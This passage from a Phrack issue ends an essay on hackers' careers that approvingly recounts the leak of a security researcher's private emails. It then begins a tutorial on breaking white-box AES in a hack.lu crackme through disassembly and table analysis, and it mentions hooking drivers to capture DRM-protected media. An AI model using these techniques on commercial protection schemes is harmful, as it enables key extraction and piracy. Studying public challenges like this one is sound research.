other hand, some of the more prominent security people, criticized this
|
|
approach [1].
|
|
|
|
Dan in turn positioned himself as a martyr, stating that everyone was going
|
|
against him, but he was willing to sacrifice himself in order to protect
|
|
the Internet.
|
|
|
|
When ZF05 was released, Dan Kaminsky's email spool and IRC logs were
|
|
published in it. The released data included a number of emails he exchanged
|
|
during the time he released the DNS bug. The emails showed exactly what
|
|
everyone in the hacking community already knew; that Dan Kaminsky was
|
|
anything but a martyr, and that everything was a large publicity stunt [2].
|
|
|
|
Even though the data were completely embarrassing and publicly exposed Dan
|
|
Kaminsky for what he really was, a master at handling the press, this had
|
|
no impact outside of the hacking community. That year, again, Dan Kaminsky
|
|
took a stand in the Black Hat Briefings conference to deliver a talk, and
|
|
was again praised. He was also later chosen to be the American
|
|
representative who holds the backups of the global DNS root keys [3].
|
|
|
|
This demonstrates that no matter how severely a security industry figure gets
|
|
owned by hackers literally (e.g. publishing their email spools and IRC
|
|
logs) or figuratively (e.g. showing qualitative evidence that their
|
|
research is flawed, stolen, inaccurate or simply unoriginal), these
|
|
individuals continue to enjoy a great deal of respect from the security
|
|
industry. To quote Paris Hilton, "There's no such thing as bad press".
|
|
|
|
With time those that choose not to compromise either live an unhappy life
|
|
frustrated by these so called "hackers" that get their recognition from the
|
|
security industry while they themselves are seen as security consultants
|
|
who just can't market themselves, or they simply choose to change their
|
|
entire career, often burned out and proclaiming that hacking is dead.
|
|
|
|
|
|
--[ 4 - Rebirth
|
|
|
|
Since the idea behind this paper is not to expose anyone, or complain about
|
|
the security industry, we want to leave this aside and move on to what
|
|
exactly a hacker can do to hack happiness.
|
|
|
|
The rebirth section is then a logical reasoning exercise on the different
|
|
paths that are available to a hacker who is also part of the information
|
|
security consulting community, as seen from the happiness maximization
|
|
perspective.
|
|
|
|
The first path is to keep fighting. This path is quite popular; over the
|
|
years we have seen many hackers forming groups and following this path (el8,
|
|
h0n0, Zero for 0wned, project m4yh3m, etc). But don't get too excited since
|
|
most of the teams that follow this path eventually disintegrate; I'll try
|
|
to explain the reasons why this happens. First, remember that humans are
|
|
very bad at predicting what would bring them happiness. With that in mind,
|
|
most of these groups form with the ideal of exerting a big change onto the
|
|
security community. The problem with this approach is that they really have
|
|
no control over the consumers of the industry, which is exactly where the
|
|
problem really is. As these groups try to exert a change they quickly
|
|
discover that even when their actions lead to undeniable proof of their
|
|
arguments and are completely convincing to other hackers, they don't seem
|
|
to affect regular people. Their initial victories and support from the
|
|
hacking community will bring them a new wave of happiness, but as time goes
|
|
frustration from not being able to have an impact beyond the hacker
|
|
community will then start to build up, which leads to their level of
|
|
happiness to drop, eventually disintegrating the group. You would be wise,
|
|
if you are thinking of taking this path not to take my word for it, but
|
|
just look at the history of the groups that precede you, and then decide.
|
|
|
|
Your other path is simply to ignore all of this and just keep working on
|
|
the sidelines as a security consultant. As someone who was once part of the
|
|
security industry - being on the sidelines without compromising my ideals
|
|
while I saw others with little skill rise - I can honestly tell you
|
|
it will make you sick. For some people, professional success is a very
|
|
important part of their overall happiness. So if you choose to follow this
|
|
path first make sure that professional success is not a very important part
|
|
of your life. If that is the case, instead focus on other activities from
|
|
which you can derive happiness. One great choice is participating in open
|
|
source projects, or building one yourself. There are of course many other
|
|
alternatives like family, sports etc, all of which can bring you immense
|
|
happiness. On the other hand, if your personality is that of someone very
|
|
ambitious, following this path will make you very unhappy for obvious
|
|
reasons.
|
|
|
|
Finally there is one more path. Simply accepting this is how the security
|
|
industry works (these are the rules of the game), and playing the game. In
|
|
this scenario, as you begin to rise you will discover that in order to
|
|
move higher you are going to have to make some ethical compromises in
order to rise up in the information security industry. Unfortunately,
|
|
even though your professional success will bring some happiness with it,
|
|
you will start to feel as if you sold your "soul" to the devil. This
|
|
feeling will start bringing your happiness levels down, and the more you
|
|
compromise the bigger impact this will have. At the same time, you will
|
|
start hating your job for forcing you to compromise your ideals. This in
|
|
effect will cause your professional success to no longer bring you any
|
|
happiness. The combination of both hating your job and compromising your
|
|
ideals will bring your happiness levels very low. Eventually you will
|
|
falsely reach the conclusion that you no longer like hacking, that hacking
|
|
is dead, and this is why you feel so unhappy.
|
|
|
|
Fortunately for you, the security industry is not the only option. Your
|
|
skills and intelligence will be valued in different industries. It is up to
|
|
you to decide what kind of career you would like to pursue. Many hackers
|
|
choose to work as software engineers, which is a very good option since
|
|
they already possess a great deal of knowledge in this area. But you are not
|
|
restricted to the software engineering industry. In fact I've seen cases
|
|
where hackers have chosen careers that have nothing to do with computing,
|
|
far away actually, such as music or art, and they are quite successful and
|
|
happy.
|
|
|
|
This does not mean you are giving up on hacking; in fact it is quite the
|
|
opposite. Many people, including myself, do hacking as a hobby and choose
|
|
to participate in a different industry for our living income. If you choose
|
|
this path you will realize that being part of this community will bring
|
|
you a lot of happiness. Deep inside you already know this if you are
|
|
reading this article. The real reason you started hacking in the first
|
|
place was not because you were good at it, or because you liked computers;
|
|
it was because it made you happy and there is no reason why this has to
|
|
change.
|
|
|
|
For those of you that have been in the security industry for a while, which
|
|
are unhappy with the current situation and are blaming the hacking
|
|
community for this, don't. Understand that it is not the hacking community
|
|
which has problems but the security industry and that once you start
|
|
hacking as a hobby again those feelings you once had will come back.
|
|
|
|
|
|
--[ 5 - Conclusions
|
|
|
|
I hope I brought some understanding to what makes people happier, what you
|
|
should look for in any industry you seek to work in if you want to maximize
|
|
your happiness, and more importantly how the security industry behaves.
|
|
|
|
Hopefully some of you will be able to make better decisions, and ultimately
|
|
the conclusion should be:
|
|
|
|
- Hacking will never die, because ultimately we all want happiness, and
|
|
hacking brings happiness. -
|
|
|
|
HAPPY HACKING!
|
|
|
|
|
|
--[ 6 - References
|
|
|
|
[0] http://dankaminsky.com/2008/07/09/an-astonishing-collaboration/
|
|
[1] https://lists.immunityinc.com/pipermail/dailydave/2008-July/005177.html
|
|
[2] http://attrition.org/misc/ee/zf05.txt
|
|
[3] http://www.root-dnssec.org/tcr/selection-2010/
|
|
|
|
|
|
--[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x08 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=--------=[ Practical cracking of white-box implementations ]=---------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=---------------=[ by SysK - whiteb0x [o] phrack o org ]=---------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|
|
-------
|
|
|
|
1 - Introduction
|
|
|
|
2 - What is a WB implementation?
|
|
|
|
3 - The things you should know about white-boxes
|
|
3.1 - Products available
|
|
3.2 - Academic state of the art
|
|
|
|
4 - Handling the first case: hack.lu's challenge
|
|
4.1 - The discovery step
|
|
4.2 - The key recovery
|
|
4.3 - Random thoughts
|
|
|
|
5 - White-boxing the DES
|
|
5.1 - The DES algorithm
|
|
5.2 - An overview of DES WB primitives
|
|
|
|
6 - Breaking the second case: Wyseur's challenge
|
|
6.1 - Efficient reverse engineering of the binary
|
|
6.2 - The discovery step
|
|
6.3 - Recovering the first subkey
|
|
6.4 - Recovering the original key
|
|
|
|
7 - Conclusion
|
|
|
|
8 - Gr33tz
|
|
|
|
9 - References
|
|
|
|
10 - Appendix: Source code
|
|
|
|
-------
|
|
|
|
|
|
--[ 1 - Introduction
|
|
|
|
|
|
This paper is about WB (white-box) cryptography. You may not have heard
|
|
too much about it but if you're focused on reverse engineering and more
|
|
precisely on software protections, then it may be of interest for you.
|
|
|
|
Usually, the common way to learn something valuable in cryptography is
|
|
either to read academic papers or cryptography books (when they're written
|
|
by true cryptographers). However as cryptography is about maths, it can
|
|
sometimes seem too theoretical for the average reverser/hacker. I'm willing
|
|
to take a much more practical approach using a combination of both reverse
|
|
engineering and elementary maths.
|
|
|
|
Obviously such a paper is not written for cryptographers but rather for
|
|
hackers or crackers unfamiliar with the concept of white-box and willing to
|
|
learn about it. Considering the quasi non existence of public
|
|
implementations to play with as well as the 'relatively' small amount of
|
|
valuable information on this subject, I hope this will be of interest. Or
|
|
at the very least that it will be a pleasant read... O:-)
|
|
|
|
|
|
--[ 2 - What is a WB implementation?
|
|
|
|
|
|
So let's begin with a short explanation. A white-box is a particular
|
|
implementation of a cryptographic primitive designed to resist to the
|
|
examination of its internals. Consider the case of a binary embedding (and
|
|
using) a symmetric primitive (such as AES for example). With the common
|
|
implementations, the AES key will always leak in memory at some point of
|
|
the execution of the program. This is the classic case of a reverser using
|
|
a debugger. No matter how hard it may be (anti-debug tricks, obfuscation of
|
|
the key, etc.), he will always find a way to intercept the key. White-box
|
|
cryptography techniques were designed to solve this problematic which is
|
|
very common, especially in the field of DRM (Digital Rights Management).
|
|
|
|
So how does it work? The main concept that you should remember is that
|
|
the key is never explicit. Or you could say that it's mathematically
|
|
transformed or 'fused' with the encryption routine. So for one key there is
|
|
one particular obfuscated primitive which is strictly equivalent to the
|
|
original one*. For a same input, both implementations will produce an
|
|
identical output. The mathematical transformation is designed in such a way
|
|
that an attacker with a debugger will not be able to deduce the key from
|
|
the internal state ... at least in a perfect world :-)
|
|
|
|
*: It's not 'exactly' true as we will see later with external encodings.
|
|
|
|
Confused? Then take a look at this tiny example:
|
|
|
|
-> Function1: for x in [0:3] f(x) = (k+x) % 4
|
|
-> Function2: for x in [0:3] g(x) = S[x] with S = [3,0,1,2]
|
|
|
|
If k==3, then the two functions f() and g() are equivalent. However the
|
|
first one explicitly uses the key 'k' whereas the second one doesn't, being
|
|
implemented as a lookup table (LUT). You could say that g() is a white-box
|
|
implementation of f() (albeit a very weak one) for the key 3. While this
|
|
example is easy to understand, you will soon discover that things are more
|
|
complicated with the obfuscation of a whole real life crypto primitive.
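
As a quick sanity check, here is a minimal sketch (Python, mine, not part
of any real white-box tooling) that builds the lookup table of g() from f()
for k=3 and verifies that the two functions match:

    # Toy "white-box": precompute f(x) = (k + x) % 4 into a lookup table,
    # so that the key k no longer appears explicitly in the code using it.
    k = 3
    S = [(k + x) % 4 for x in range(4)]       # S == [3, 0, 1, 2]

    def f(x): return (k + x) % 4              # explicit key
    def g(x): return S[x]                     # key 'fused' into the table

    assert all(f(x) == g(x) for x in range(4))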
|
|
|
|
|
|
--[ 3 - The things you should know about white-boxes
|
|
|
|
|
|
<<<<<<<<<<<<<<<<<< DISCLAIMER <<<<<<<<<<<<<<<<<<
|
|
> I will voluntarily not enter into too much <
|
|
> details. As I said, the paper is based on a <
|
|
> practical approach so let's avoid the maths <
|
|
> for the moment. <
|
|
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|
|
|
|
|
|
----[ 3.1 Products available
|
|
|
|
|
|
WB cryptography is essentially implemented in commercial security
|
|
products by a relatively small number of companies (Cloakware -acquired by
|
|
Irdeto-, Whitecryption, Arxan, Syncrosoft, etc.). Usually they provide a
|
|
secure API which is then integrated into other security primitives, often
|
|
for DRM purposes. Amongst other things, they design WB primitives for
|
|
symmetric encryption (DES, AES) but also MAC (HMAC, CMAC) and asymmetric
|
|
primitives (ECC, RSA, DSA).
|
|
|
|
How often do we come across WB in the wild? More often than you might
think! For example you can see in [R10] that Irdeto has many famous
customers including TI, Sony, Adobe and NetFLIX. WB cryptography will most
likely become more and more present in software protections.
|
|
|
|
As far as I can tell, there are unfortunately only 2 public (non
|
|
commercial) examples of WB implementations, both with undisclosed
|
|
generators:
|
|
|
|
- The first historical one is a binary available on Brecht Wyseur's
|
|
website [R04] and is a WB DES implementation. Brecht challenges
|
|
people to find the key:
|
|
|
|
"If you like, try to extract the secret key, using all information
|
|
you can find from this implementation (besides brute-force black-box
|
|
attacks of course)."
|
|
|
|
Keep in mind that this is a challenge, not some production code.
|
|
|
|
- The second one less likely to be known is a challenge proposed by Jb
|
|
for the 2009 edition of hack.lu [R02]. This one is a simplistic AES
|
|
WB but was never labeled officially as such. Part of the challenge is
|
|
indeed to find out (oops!).
|
|
|
|
The cryptanalysis involved is obviously far below the academic state of
|
|
the art but it's nonetheless an interesting one and a first step for who
|
|
wants to be serious and aims at defeating more robust implementations.
|
|
|
|
We'll study both starting with Jb's binary and see how the solution can
|
|
be found in each case.
|
|
|
|
,---.
|
|
,.'-. \
|
|
( ( ,'"""""-.
|
|
`,X `.
|
|
/` ` `._
|
|
( , ,_\
|
|
| ,---.,'o `.
|
|
| / o \ )
|
|
\ ,. ( .____,
|
|
\| \ \____,' \
|
|
'`'\ \ _,____,'
|
|
\ ,-- ,-' \
|
|
( C ,' \
|
|
`--' .' |
|
|
| | .O |
|
|
__| \ ,-'_
|
|
/ `L `._ _,' ' `.
|
|
/ `--.._ `',. _\ `
|
|
`-. /\ | `. ( ,\ \
|
|
_/ `-._ / \ |--' ( \
|
|
' `-. `' \/\`. `. )
|
|
\ -hrr- \ `. | |
|
|
|
|
|
|
----[ 3.2 Academic state of the art
|
|
|
|
|
|
AFAIK academic publications are limited to symmetric encryption and
especially to DES and AES (though the SPN case is somewhat extended in
[R08]).
|
|
Explaining the history of the design and the cryptanalysis techniques which
|
|
were developed would be complicated and is already explained with great
|
|
details in the thesis of Brecht Wyseur [R04].
|
|
|
|
The main question is to know if there exists a secure WB design and if
|
|
you consider the current state of the art in cryptography, well... there
|
|
isn't! There is currently no implementation proposal not broken by design.
|
|
And in this case, broken means a key recovery in a matter of seconds in the
|
|
worst case. Yes, _that_ broken!
|
|
|
|
However, real-life white-box cryptography may be different because:
|
|
|
|
- As explained before, proprietary implementations of algorithms
|
|
not mentioned in any paper (MAC algorithms, asymmetric ones)
|
|
exist. This proves that people were smart enough to design new
|
|
implementations. On the other hand, without any formal analysis
|
|
of these implementations, nothing can be said regarding their
|
|
effective security.
|
|
|
|
- Cloakware products were at least partially designed/written by
|
|
the cryptographers who designed the first white-box [R7]. On one
|
|
hand you may suspect that their product is broken by design.
|
|
Alternatively it can be assumed that it is at least immune
|
|
against current cryptanalysis techniques. Little can be said
|
|
about other protections (whitecryption, Arxan, Syncrosoft) but we
|
|
could speculate that it's not of the same caliber.
|
|
|
|
So are WB protections hard to break in practice? Who knows? But
|
|
remember that protecting the key is one thing while protecting content is
|
|
something different. So if you ever audit a white-box solution, before
|
|
trying to retrieve the key, see if you can intercept the plaintexts. There
|
|
are lots of possible attacks, potentially bypassing the WB protections
|
|
[R06].
|
|
|
|
Remark: Obviously in the case of DRM (if no hardware protection is
|
|
involved), you will always find a way to intercept unencrypted data. This
|
|
is because at some point the player will have to send audio/video streams
|
|
to the sound/video card drivers and you may want to hook some of their
|
|
functions to recover the media. This is however a practice to forget if the
|
|
media requires the synchronization of several streams (i.e. movies with
|
|
both audio and video).
|
|
|
|
Now that said, let's begin with the first challenge :)
|
|
|
|
|
|
--[ 4 - Handling the first case: hack.lu's challenge
|
|
|
|
|
|
I have to thank Jb for this binary as he was the one who suggested that I
solve it a few days ago*. Unfortunately my solution is biased as I knew
|
|
from the very beginning that it was an AES white-box. I may have taken a
|
|
different approach to solve it if I hadn't. This is however a good enough
|
|
example to introduce WB protections.
|
|
|
|
*: Phrack being usually late "a few days ago" probably means "a few weeks**
|
|
ago"
|
|
**: Phrack being _indeed_ late "a few weeks ago" is now "a few months ago"
|
|
;>
|
|
|
|
|
|
----[ 4.1 - The discovery step
|
|
|
|
|
|
Since the challenge is about breaking an AES white-box, it means that
|
|
we may need to perform several tasks:
|
|
|
|
- finding out if the WB is an AES or an AES^-1 and the associated key
|
|
length: 16 (AES-128), 24 (AES-192), 32 (AES-256)? We want to discover
|
|
exactly *what* was white-boxed.
|
|
|
|
- reversing every cryptographic functions involved and discovering how
|
|
they are related to the original AES functions. This is about
|
|
understanding *how* the implementation was white-boxed.
|
|
|
|
- finding a way to recover the original key.
|
|
|
|
I won't describe the AES as it's not necessary to understand this part.
|
|
The necessary details will be provided a bit later. First of all, let's see
|
|
how the serial is retrieved. We'll start by a quick reverse engineering of
|
|
the sub_401320() function:
|
|
|
|
---------------------------------------------------------------------------
|
|
mov eax, [esp+38h+hDlg]
|
|
push 21h ; cchMax
|
|
lea ecx, [esp+3Ch+String]
|
|
push ecx ; lpString
|
|
push 3ECh ; nIDDlgItem
|
|
push eax ; hDlg
|
|
call ds:GetDlgItemTextA
|
|
cmp eax, 20h ; is length == 32?
|
|
---------------------------------------------------------------------------
|
|
|
|
Without too much surprise, GetDlgItemText() is called to retrieve an
|
|
alpha-numeric string. The comparison in the last line implies a length of
|
|
32 bytes in its ASCII representation (not including the null byte) hence a
|
|
16 bytes serial. Let's continue:
|
|
|
|
---------------------------------------------------------------------------
|
|
cmp eax, 20h
|
|
jz short good_serial ; if len is ok then start the
|
|
; conversion
|
|
|
|
bad_serial:
|
|
xor eax, eax
|
|
[...]
|
|
retn ; return 0
|
|
good_serial:
|
|
push ebx
|
|
push esi
|
|
xor esi, esi ; i=0
|
|
nop
|
|
|
|
build_data_buffer:
|
|
movzx edx, [esp+esi*2+40h+String]
|
|
push edx
|
|
call sub_4012F0 ; get least significant nibble
|
|
mov ebx, eax
|
|
movzx eax, [esp+esi*2+44h+var_27]
|
|
push eax
|
|
shl bl, 4
|
|
call sub_4012F0 ; get most significant nibble
|
|
or bl, al ; bl is now a converted byte
|
|
mov byte ptr [esp+esi+48h+input_converted], bl
|
|
; input_converted[i] = bl
|
|
inc esi ; i++
|
|
add esp, 8
|
|
cmp esi, 10h
|
|
jl short build_data_buffer
|
|
|
|
lea ecx, [esp+40h+input_converted]
|
|
push ecx
|
|
mov edx, ecx
|
|
push edx
|
|
call sub_401250 ; white-box wrapper
|
|
add esp, 8
|
|
pop esi
|
|
mov eax, 10h
|
|
xor ecx, ecx
|
|
pop ebx
|
|
|
|
; Compare the resulting buffer byte after byte
|
|
|
|
compare_buffers:
|
|
mov edx, [esp+ecx+38h+input_converted]
|
|
cmp edx, dword ptr ds:aHack_lu2009Ctf[ecx]
|
|
; "hack.lu-2009-ctf"
|
|
jnz short bad_serial
|
|
sub eax, 4
|
|
add ecx, 4
|
|
cmp eax, 4
|
|
jnb short compare_buffers
|
|
[...]
|
|
retn
|
|
---------------------------------------------------------------------------
|
|
|
|
The alphanumeric string is then converted byte by byte by the sub_4012F0()
function into the corresponding plaintext (or ciphertext) block used for
the cryptographic manipulations. The function sub_401250() is then called
|
|
taking it as a parameter. When the function returns, the buffer is then
|
|
compared to the "hack.lu-2009-ctf" string (16 bytes). If both are equal,
|
|
the serial is valid (the function returns 1).
|
|
|
|
Let's see sub_401250() in more detail:
|
|
|
|
---------------------------------------------------------------------------
|
|
sub_401250 proc near ; WrapperWhiteBox
|
|
[...]
|
|
mov eax, [esp+14h+arg_0]
|
|
push esi
|
|
mov esi, [esp+18h+arg_4]
|
|
xor ecx, ecx
|
|
add eax, 2
|
|
lea esp, [esp+0]
|
|
|
|
permutation1:
|
|
; First step is a transposition (special permutation)
|
|
|
|
movzx edx, byte ptr [eax-2]
|
|
mov [esp+ecx+18h+var_14], dl
|
|
movzx edx, byte ptr [eax-1]
|
|
mov [esp+ecx+18h+var_10], dl
|
|
movzx edx, byte ptr [eax]
|
|
mov [esp+ecx+18h+var_C], dl
|
|
movzx edx, byte ptr [eax+1]
|
|
mov [esp+ecx+18h+var_8], dl
|
|
inc ecx
|
|
add eax, 4
|
|
cmp ecx, 4
|
|
jl short permutation1
|
|
|
|
; Second step is calling the white-box
|
|
|
|
lea eax, [esp+18h+var_14]
|
|
push eax
|
|
call sub_401050 ; call WhiteBox
|
|
[...]
|
|
|
|
permutation2:
|
|
; Third step is also a transposition
|
|
; Bytes' position are restored
|
|
|
|
movzx edx, [esp+ecx+14h+var_14]
|
|
mov [eax-2], dl
|
|
movzx edx, [esp+ecx+14h+var_10]
|
|
mov [eax-1], dl
|
|
movzx edx, [esp+ecx+14h+var_C]
|
|
mov [eax], dl
|
|
movzx edx, [esp+ecx+14h+var_8]
|
|
mov [eax+1], dl
|
|
inc ecx
|
|
add eax, 4
|
|
cmp ecx, 4
|
|
jl short permutation2
|
|
[...]
|
|
retn
|
|
---------------------------------------------------------------------------
|
|
|
|
At first sight, sub_401250() is composed of three elements:
|
|
|
|
- A first bunch of instructions operating on the buffer which is
|
|
no more than a (4x4) matrix transposition operating on bytes.
|
|
|
|
For example:
|
|
|
|
A B C D A E I M
|
|
E F G H becomes B F J N
|
|
I J K L C G K O
|
|
M N O P D H L P
|
|
|
|
This is a common step to prepare the plaintext/ciphertext block
|
|
into the so-called "state" as the AES is operating on 4x4 matrix.
|
|
|
|
- This function is then calling sub_401050() which is composed of
|
|
elementary operations such as XOR, rotations and substitutions.
|
|
|
|
- A second transposition. One important thing to know about the
|
|
transposition is that the function is its own inverse. The former
|
|
bytes' positions are thus restored.
|
|
|
|
sub_401050() is the WB. Whether it's an AES or an AES^-1 function and
|
|
its keylength has yet to be determined. The serial acts as a plaintext or
|
|
a ciphertext which is (de,en)crypted using a key that we want to retrieve.
|
|
Since the output buffer is compared with an English sentence, it seems fair
|
|
to assume that the function is an AES^-1.
|
|
|
|
|
|
Reverse engineering of sub_401050()
|
|
-----------------------------------
|
|
|
|
|
|
Detailing the whole reverse engineering steps is both boring and
|
|
meaningless as it doesn't require special skills. It's indeed pretty
|
|
straightforward. The resulting pseudo C code can be written as such:
|
|
|
|
----------------------------- First version -------------------------------
|
|
void sub_401050(char *arg0)
|
|
{
|
|
int round,i;
|
|
|
|
// 9 first rounds
|
|
for(round=0; round<9; round++)
|
|
{
|
|
// step-1(round)
|
|
for(i=0; i<16; i++)
|
|
arg0[i] = (char) 0x408138[ i + (arg0[i] + round*0x100)*16 ];
|
|
|
|
// step-2
|
|
sub_401020(arg0);
|
|
|
|
// step-3
|
|
for(i=0; i<4; i++)
|
|
{
|
|
char cl,dl, bl, var_1A;
|
|
|
|
cl = byte_414000[ arg0[0+i]*4 ];
|
|
cl ^= byte_414400[ arg0[4+i]*4 ];
|
|
cl ^= byte_414800[ arg0[8+i]*4 ];
|
|
cl ^= byte_414C00[ arg0[12+i]*4 ];
|
|
|
|
dl = byte_414000[ 1 + arg0[0+i]*4 ];
|
|
dl ^= byte_414400[ 1 + arg0[4+i]*4 ];
|
|
dl ^= byte_414800[ 1 + arg0[8+i]*4 ];
|
|
dl ^= byte_414C00[ 1 + arg0[12+i]*4 ];
|
|
|
|
bl = byte_414000[ 2 + arg0[0+i]*4 ];
|
|
bl ^= byte_414400[ 2 + arg0[4+i]*4 ];
|
|
bl ^= byte_414800[ 2 + arg0[8+i]*4 ];
|
|
bl ^= byte_414C00[ 2 + arg0[12+i]*4 ];
|
|
|
|
var_1A = bl;
|
|
|
|
bl = byte_414000[ 3 + arg0[0+i]*4 ];
|
|
bl ^= byte_414400[ 3 + arg0[4+i]*4 ];
|
|
bl ^= byte_414800[ 3 + arg0[8+i]*4 ];
|
|
bl ^= byte_414C00[ 3 + arg0[12+i]*4 ];
|
|
|
|
arg0[0+i] = cl;
|
|
arg0[4+i] = dl;
|
|
arg0[8+i] = var_1A;
|
|
arg0[12+i] = bl;
|
|
}
|
|
}
|
|
|
|
// step-4
|
|
for(i=0; i<16; i++)
|
|
arg0[i] = (char) 0x411138 [ i + arg0[i] * 16 ]
|
|
|
|
// step-5
|
|
sub_401020(arg0);
|
|
return;
|
|
}
|
|
----------------------------- First version -------------------------------
|
|
|
|
It seems that we have 10 (9 + 1 special) rounds, which probably means
an AES-128 or an AES-128^-1 (hence a 16-byte keylength as both are
|
|
related).
|
|
|
|
Remark: Something very important is that we will try to solve this problem
|
|
using several assumptions or hypotheses. For example there is no evident
|
|
proof that the number of rounds is 10. It _seems_ to be 10 but until the
|
|
functions (and especially the tables) involved are analyzed, we should
|
|
always keep in mind that we may be wrong with the guess and that some evil
|
|
trick could have been used to fool us.
|
|
|
|
Now we have the big picture, let's refine it a bit. For that, we will
|
|
analyze:
|
|
|
|
- The tables at addresses 0x408138 (step-1) and 0x411138 (step-4)
|
|
- The round independent function sub_401020 (step-2, step-5)
|
|
- step-3 and the 16 arrays byte_414x0y with:
|
|
- x in {0,4,9,C}
|
|
- y in {0,1,2,3}
|
|
|
|
The tables are quite easy to analyze. A short look at them shows that
|
|
there is one substitution table per character per round. Each substitution
|
|
seems to be a "random" bijection. Additionally, 0x408138 + 16*256*9 =
|
|
0x411138 (which is the address of the last round's table).
|
|
|
|
The function sub_401020() is a mere wrapper of function sub_401000():
|
|
|
|
---------------------------------------------------------------------------
|
|
void sub_401020(arg0)
|
|
{
|
|
int i;
|
|
|
|
for(i=0; i<4; i++)
|
|
sub_401000(arg0, 4*i, i);
|
|
}
|
|
|
|
// arg4 parameter is useless but who cares?
|
|
void sub_401000(arg0, arg4, arg8)
|
|
{
|
|
if(arg8 != 0)
|
|
{
|
|
(int) tmp = ((int)arg0[4*arg8] << (8*arg8)) & 0xFFFFFFFF;
|
|
(int) arg0[4*arg8] = tmp | ((int)arg0[4*arg8] >> (32-(8*arg8)));
|
|
}
|
|
return;
|
|
}
|
|
---------------------------------------------------------------------------
|
|
|
|
This is clearly the ShiftRows() elementary function of the AES.
|
|
For example:
|
|
|
|
59 49 90 3F 59 49 90 3F [ <<< 0 ]
|
|
30 A7 02 8C becomes A7 02 8C 30 [ <<< 1 ]
|
|
0F A5 07 22 07 22 0F A5 [ <<< 2 ]
|
|
F9 A8 07 DD DD F9 A8 07 [ <<< 3 ]
|
|
|
|
here '<<<' is a cyclic shift
|
|
|
|
ShiftRows() is used in the encryption function while the decryption
|
|
function uses its inverse. Unless there is a trap to fool us, this is a
|
|
serious hint that our former assumption was wrong and that the WB is an
|
|
AES, not an AES^-1.
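
For reference, the textbook ShiftRows is easy to model; the following
minimal sketch (Python, mine) works on a row-major 4x4 state and reproduces
the example above:

    # Row r of the 4x4 state is rotated left by r positions.
    def shift_rows(state):                    # state: 16 bytes, row-major
        rows = [state[4*r:4*r+4] for r in range(4)]
        return sum([row[i:] + row[:i] for i, row in enumerate(rows)], [])

    state = [0x59,0x49,0x90,0x3F, 0x30,0xA7,0x02,0x8C,
             0x0F,0xA5,0x07,0x22, 0xF9,0xA8,0x07,0xDD]
    print([hex(b) for b in shift_rows(state)])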
|
|
|
|
Now regarding step-3 let's begin by looking at the tables. They all
|
|
hold bijections but clearly neither random nor distinct ones. Let's look
|
|
for example at the byte_414400 table:
|
|
|
|
byte_414400 : 0 3 6 5 C F A 9 ...
|
|
|
|
(The elements of this table are located at 0x414400, 0x414404,
|
|
0x41440C, etc. This is because of the *4 that you can see in the C
|
|
code. This rule also applied to the 15 other tables.)
|
|
|
|
If you ever studied/implemented the AES then you must know that its
|
|
structure is algebraic. The MixColumns in particular is an operation
|
|
multiplying each column of the state by a particular 4x4 matrix. The
|
|
coefficients of such mathematical objects are _not_ integers but rather
|
|
elements of GF(2^8) whose representation is fixed by a particular binary
|
|
polynomial.
|
|
|
|
Now if you don't have a clue about what I'm saying let's just say that
|
|
the multiplication of said AES coefficients is not a simple integer
|
|
multiplication. Since the calculus in itself would be highly inefficient
|
|
most implementations use special tables holding the precomputed results.
|
|
AES requires knowing how to multiply by 01, 02, and 03 in GF(2^8). In
|
|
particular byte_414400 is a table used to compute b = 3*a in such field (a
|
|
is the index of the table and b is the value stored at this index).
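
If you want to check this by yourself, these tables are easy to regenerate;
here is a minimal sketch (Python, mine) using the usual xtime trick, i.e.
multiplication by 02 modulo the AES polynomial x^8+x^4+x^3+x+1:

    # Multiplication by 02 in GF(2^8), reduced by the AES polynomial 0x11b.
    def xtime(a):
        a <<= 1
        if a & 0x100:
            a ^= 0x11b
        return a & 0xff

    mul2 = [xtime(a) for a in range(256)]       # 00 02 04 06 08 0A 0C 0E ...
    mul3 = [xtime(a) ^ a for a in range(256)]   # 00 03 06 05 0C 0F 0A 09 ...

    print([hex(b) for b in mul3[:8]])   # matches the start of byte_414400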
|
|
|
|
Now let's look at the tables. In each case it was easy to see that they
|
|
were holding a precomputed multiplication by a given coefficient:
|
|
|
|
byte_414000 : 0 2 4 6 8 A C E ... // Coef = 2
|
|
byte_414400 : 0 3 6 5 C F A 9 ... // Coef = 3
|
|
byte_414800 : 0 1 2 3 4 5 6 7 ... // Coef = 1
|
|
byte_414C00 : 0 1 2 3 4 5 6 7 ... // Coef = 1
|
|
|
|
byte_414001 : 0 1 2 3 4 5 6 7 ... // Coef = 1
|
|
byte_414401 : 0 2 4 6 8 A C E ... // Coef = 2
|
|
byte_414801 : 0 3 6 5 C F A 9 ... // Coef = 3
|
|
byte_414C01 : 0 1 2 3 4 5 6 7 ... // Coef = 1
|
|
|
|
byte_414002 : 0 1 2 3 4 5 6 7 ... // Coef = 1
|
|
byte_414402 : 0 1 2 3 4 5 6 7 ... // Coef = 1
|
|
byte_414802 : 0 2 4 6 8 A C E ... // Coef = 2
|
|
byte_414C02 : 0 3 6 5 C F A 9 ... // Coef = 3
|
|
|
|
byte_414003 : 0 3 6 5 C F A 9 ... // Coef = 3
|
|
byte_414403 : 0 1 2 3 4 5 6 7 ... // Coef = 1
|
|
byte_414803 : 0 1 2 3 4 5 6 7 ... // Coef = 1
|
|
byte_414C03 : 0 2 4 6 8 A C E ... // Coef = 2
|
|
|
|
As a result, step-3 can be written as:
|
|
|
|
[ arg0(0,i) [ 02 03 01 01 [ arg0(0,i)
|
|
arg0(4,i) = 01 02 03 01 x arg0(4,i)
|
|
arg0(8,i) 01 01 02 03 arg0(8,i)
|
|
arg0(c,i) ] 03 01 01 02 ] arg0(c,i) ]
|
|
|
|
And this is exactly the MixColumns of the AES! Everything taken into
|
|
account gives this new version of sub_401250():
|
|
|
|
---------------------------- Second version -------------------------------
|
|
void sub_401050(char *arg0)
|
|
{
|
|
int round,i;
|
|
|
|
// 9 first rounds
|
|
for(round=0; round<9; round++)
|
|
{
|
|
// step-1(round)
|
|
for(i=0; i<16; i++)
|
|
arg0[i] = (char) 0x408138[ i + (arg0[i] + round*0x100)*16 ];
|
|
|
|
// step-2
|
|
ShiftRows(arg0);
|
